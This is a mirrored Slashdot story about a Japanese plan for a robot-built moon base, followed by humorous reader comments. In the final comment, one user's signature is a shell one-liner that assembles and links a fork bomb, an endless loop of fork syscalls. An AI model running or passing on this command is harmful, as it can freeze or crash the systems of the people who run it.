Slashdot Mirror


Japan Plans Moon Base Built By Robots For Robots

An anonymous reader writes "The Japanese space agency, JAXA, has plans to build a base on the Moon by 2020. Not for humans, but for robots — and built by robots, too. A panel authorized by Japan's prime minister has drawn up preliminary plans for how humanoid and rover robots will begin surveying the moon by 2015, and then begin construction of a base near the south pole of the moon. The robots and the base will run on solar power, with total costs about $2.2 billion USD, according to the panel chaired by Waseda University President Katsuhiko Shirai. 'As currently envisioned, the robots that will land on the lunar surface in 2015 will be 660-pound behemoths equipped with rolling tank-like treads, solar panels, seismographs, high-def cameras, and a smattering of scientific instruments. They'll also have human-like arms for collecting rock samples that will be returned to Earth via rocket.'"

19 of 253 comments (clear)

  1. Obligatory by Anonymous Coward · · Score: 1, Funny

    I for one welcome our 660-pound moon-dwelling robot overlords

    1. Re:Obligatory by WrongSizeGlass · · Score: 2, Funny

      Moon Base Built By Robots For Robots

      So these robots are already planning to build a moon base that discriminates against humans? I wonder if that's because they'll be doing secret robot research there into the preliminary SkyNET satellite network? The moon is in the sky, and SkyNET is in the sky ... coincidence? I think not.

    2. Re:Obligatory by racasper · · Score: 5, Funny

      Remember they are Japanese - these robots will probably look like adolescent schoolgirls.

  2. All Your Base Are Belong To Us by Anonymous Coward · · Score: 1, Funny

    Oh that seems so appropriate right now...

    1. Re:All Your Base Are Belong To Us by TheRaven64 · · Score: 4, Funny

      Note, however, that this project is not going to be under the control of the Japanese Ministry of Agriculture.

      --
      I am TheRaven on Soylent News
  3. optimistic Japanese by Dyinobal · · Score: 4, Funny

    Ya I'm not so optimistic about the trust worthiness of robots. This sounds to me like they are practically giving them the perfect rebel base, for when the robot rebellion comes.

    1. Re:optimistic Japanese by KDR_11k · · Score: 2, Funny

      So what if they rebel? We'll send up our own HERCs and wreck the Prometheus core.

      --
      Justice is the sheep getting arrested while an impartial judge declares the vote void.
  4. The start of the revolution... by Geraden · · Score: 4, Funny

    That's all good, until they start to hurl moon rocks at us, via a robot-built rail gun.

  5. What about the sailors? by 0100010001010011 · · Score: 4, Funny

    Should they bite your shiny metal ass?

  6. Re:and why, exactly? by gzipped_tar · · Score: 4, Funny

    Your UID sounds un-American. All your bases will be belong to US.

    --
    Colorless green Cthulhu waits dreaming furiously.
  7. Foolish Japanese by Anonymous Coward · · Score: 1, Funny

    The robots and the base will run on solar power

    They won't get much solar power on the moon since it's only out at night. We should copy their idea but build our base on the sun.

  8. Re:and why, exactly? by Johann+Lau · · Score: 1, Funny

    uh... yeah, that makes a LOT more sense than "take the moon" haha... oh well, thanks for the opportunity to rant anyway huh ^^

  9. Go go Grendizer! by XnR'rn · · Score: 2, Funny

    They were culturally indoctrinated for years for stuff like this (random link to random giant robot anime ommited). I am not surprised.

  10. Re:and why, exactly? by gzipped_tar · · Score: 5, Funny

    I guess I'm from the 1st category "people who own America" according to your hierarchy. I'm Chinese.

    --
    Colorless green Cthulhu waits dreaming furiously.
  11. Ohhhhhhhhh by dreemernj · · Score: 5, Funny

    We're whalers on the Moon, we carry a harpoon. But there ain't no whales so we tell tall tales and sing our whaling tune.

    --
    1 (short ton / firkin) = 89.1432354 slugs / keg
  12. Re:Just $2.2 Billion? by Gorobei · · Score: 5, Funny

    Hey, I just do rockets. I can figure the cheapest way to get mass X to position Y with velocity Z.

    Dust? Ask the guys who build targets (I think they are called civil engineers or something)

  13. Re:and why, exactly? by Anonymous Coward · · Score: 2, Funny

    Fuck Empire.

    Look at me guys, I'm against nationalism! Am I cool yet?

  14. Re:Just $2.2 Billion? by Anonymous Coward · · Score: 2, Funny

    Hey, I just do rockets.

    This may be the first time I've seen someone seriously say, in effect, "I'm just a rocket scientist, how am I supposed to know?".

  15. Re:and why, exactly? by Hal_Porter · · Score: 2, Funny

    Careful! He's German - this sort of humour might give him an aneurysm.

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;